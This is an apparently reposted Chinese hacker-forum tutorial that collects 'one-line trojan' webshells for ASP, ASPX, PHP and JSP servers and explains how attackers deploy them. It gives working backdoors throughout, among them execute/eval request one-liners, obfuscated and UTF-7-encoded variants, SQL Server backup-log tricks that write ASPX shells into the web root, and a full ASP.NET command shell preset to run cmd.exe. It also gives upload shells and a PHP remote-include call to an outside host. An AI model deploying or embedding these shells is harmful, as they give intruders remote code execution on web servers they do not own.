一句話木馬的適用環境:
1.伺服器的來賓賬戶有寫入許可權
2.已知資料庫地址且資料庫格式為asa或asp
3.在資料庫格式不為asp或asa的情況下,如果能將一句話插入到asp檔案中也可
一句話木馬的工作原理:
"一句話木馬"服務端(本地的html提交檔案)
就是我們要用來插入到asp檔案中的asp語句,(不僅僅是以asp為尾碼的資料庫檔案),該語句將回為觸發,接收入侵者通過用戶端提交的資料,執行並完成相應的操作,服務端的代碼內容為 <%execute request("value")%> 其中value可以自己修改
"一句話木馬"用戶端(遠程伺服器上被插入一句話的asp檔案)
用來向服務端提交控制資料的,提交的資料通過服務端構成完整的asp功能語句並執行,也就是產生我們所需要的asp木馬檔案
現在先假設在遠程主機的TEXT.ASP(用戶端)中已經有了<%execute request("value")%>這個語句.)在ASP裡<%execute ............")%>意思是執行省略符號裡的語句.那麼如果我寫進我們精心構造的語句,它也是會幫我們執行的.就按照這上面的思路,我們就可以在本地構造一個表單內容如下:(//為注釋)
<form action=http://主機路徑/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")//建立流對象
lP.Open //開啟
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字型標準
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"),2 //將木馬內容以覆蓋檔案的方式寫入newmm.asp,2就是已覆 蓋的方式
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect "newmm.asp" //轉向newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>添入產生木馬的內容</textarea>
<center><br>
<input type=submit value=提交>
</form>
表單的作用就是把我們表單裡的內容提交到遠程主機的TEXT.ASP這個檔案.然後因為TEXT.ASP裡有<%execute request("value")%>這句,那麼這句代碼就會執行我們從表單裡傳來的內容哦.(表單名必須和<%execute request("value")%>裡的VALUE一樣,就是我用藍色標記的那兩處,必須相等)
說到這裡大家是不是清楚了.我們構造了兩個表單,第一個表單裡的代碼是檔案操作的代碼(就是把第二個表單內的內容寫入在目前的目錄下並命名為newvalue.ASP的這麼一段操作的處理代碼)那麼第二個表單當然就是我們要寫入的馬了.
具體的就是下面這一段:
set lP=server.createObject("Adodb.Stream")//建立流對象
lP.Open //開啟
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字型標準
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newvalue.asp"),2 //將木馬內容以覆蓋檔案的方式寫入newmm.asp,2就是已覆 蓋的方式
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect "newmm.asp" //轉向newmm.asp
這樣的話第二個表單的名字必須和lP.writetext request("newvalue") 裡的Newvalue一樣,就是我用紅色標註的那兩處.
至此只要伺服器有寫的許可權你表單所提交的大馬內容就會被寫入到newmm.asp中。即newmm.asp為我們的shell地址。
http://www.hxhack.com/bbs
關於伺服器錯誤:
經常,當我們在一個asp檔案內添加了一句話後,就會出現類型不符的錯誤:
Script error detected at line 1.
Source line: execute request("nettoo")
Description: 類型不符: 'execute'
這個如何解決呢?
想出了一個好辦法,只要用"eval"替換掉"execute"服務端,就不會出錯了!
用一句話用戶端串連,加入容錯語句,你可以把它插入到任何ASP檔案而不會像以前一樣出錯。
<%On Error Resume Next execute request("value")%>
常見asp一句話木馬的變體:
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
<%ExecuteGlobal request(chr(35))%>
<%ExecuteGlobal request(chr(35))%>
<%execute request("#")%>
<%execute request(chr(35))%>
<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>
<%ExecuteGlobal request(chr(35))%> 9月30日
<%eval request("#")%>
資料庫裡插入
┼攠數畣整爠煥敵瑳∨∣┩愾
utf-7的馬
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>
各種環境下的一句話木馬:
aspx
1.相當於ASP的一句話木馬:
程式碼
alter database pubs set RECOVERY FULL--
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ')
backup log pubs to disk = 'd:\test11.aspx'
//這個和asp的一樣,用戶端post一個變數l 把木馬代碼丟在變數l裡面就ok了 這個是類似asp的一句話木馬。
//mu.aspx.htm 用戶端:(提交後訪問:http://IP/images.aspx)
<form action=http://192.168.2.100/asp/mu.aspx method=post>
<b>在下面輸入大馬內容:</b><br>
<textarea name=l cols=120 rows=35 width=45>
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script><html><head>
<title>ASP.NET Shell for WebAdmin2.X Final</title>
<meta http-equiv="Content-Type" c /></head><body>
<form runat="server">
<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">;Program</asp:Label>
<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br />
<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox><br />
<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button><p>
<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label> </p></form></body></html>
</textarea>
<center><br>
<input type=submit value=提交>
2、下面這個是我找網上的asp.net的上傳檔案程式,修改精簡了下,也可以用:
程式碼
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>')
backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'
PHP
本文沒有什麼特別之處,僅求拋磚引玉。並送給和我一樣菜的在PHP門邊徘徊的朋友。
剛學PHP沒幾天,我就急於功成,所以有錯誤及不足之處請大家積極指出。
PHP文法的強大是ASP望塵莫及的,僅一個:<? phpinfo();?>就可以刺探整個伺服器的配置。運行cmd,上傳檔案等,都是非常簡便的,現在用的好的PHP木馬,莫過於angel的phpspy了。昨天hak_ban問怎麼給PHP木馬加密,我還沒想到,但是對於寫一個微型PHP木馬,我想還是很難被殺的。
這裡簡單探討一下幾個函數可以作為木馬的使用:
1. 可以運行外部命令的幾個函數:system,passthru,exec,shell_exec,popen。
例:只要將<?system($cmd);?>等儲存為cmd.php及可實現運行外部命令的功能。這幾個函數可以說是最早的微行php木馬了,所以一般虛擬機器主機的設定也會將這些函數屏蔽的。
2.還記得WDB論壇的style.php的漏洞嗎?我們可以利用這個做個很難被殺的小木馬。如下:
<?php include($include);?>
將其儲存為1.php ,我們就可以調用其他不支援php伺服器裡的.php木馬(如phpspy.php)來達到我們的目的:http://target.com/1.php? Include=http://www.xxx.com/phpspy.php
這裡http://www.918x.com是不支援php的,否則將會在http://www.xxx.com這台伺服器運行phpspy.php,而不是目標伺服器。
3. 這個還是angel在Discuz 2.2F的攻擊中給我們的一個非常好的上傳木馬,我沒有改:
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
將其儲存為up.php後,在本地提交表單:
<form ENCTYPE="multipart/form-data" ACTION="http://目標伺服器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大個的php木馬上傳上去。
4. 我一直在想有沒有同冰狐浪子的那個ASP一句話木馬一樣通過本地表單提交啟動並執行PHP木馬。終於找到了函數:eval,在PHP4中文參考手冊上它的文法說明:
文法: void eval(string code_str);
內容說明:本函數可將字串之中的變數值代入,通常用在處理資料庫的資料上。參數 code_str 為欲處理的字串。值的 注意的是待處理的字串要符合 PHP 的字串格式,同時在結尾處要有分號。使用本函數處理後的字串會沿續到 PHP 程式結束。
我們可以在目標主機上儲存:<?eval($cmd);?>為一個PHP檔案(我想也可以插在PHP任意檔案裡)。然後通過本地提交來達到目的,但與ASP不同的是,在magic_quotes_gpc = on的時候,過濾的很多的字元,使得這個使用功能大大的縮小。
對於這個PHP木馬本地表單我做了很多次,還沒有成熟的代碼。還請高手指教。寫好後會奉獻給大家的。但是eval這個函數可以做微型PHP木馬是無須質疑的。
Ps:寫完後,有人告訴我,其實高手早就有微型的PHP木馬了,只是沒有公開。哎,我好鬱悶啊,研究的都是人家早就有了的成果。不管怎麼樣,和大家分享一下我的研究,希望能得到協助和指教。
JSP
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
這個 後門估計不用我說了吧.還是提示一下咯.儲存為1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然後:http://localhost/1.txt 就出來了 內容為 hello .....
總結完畢---轉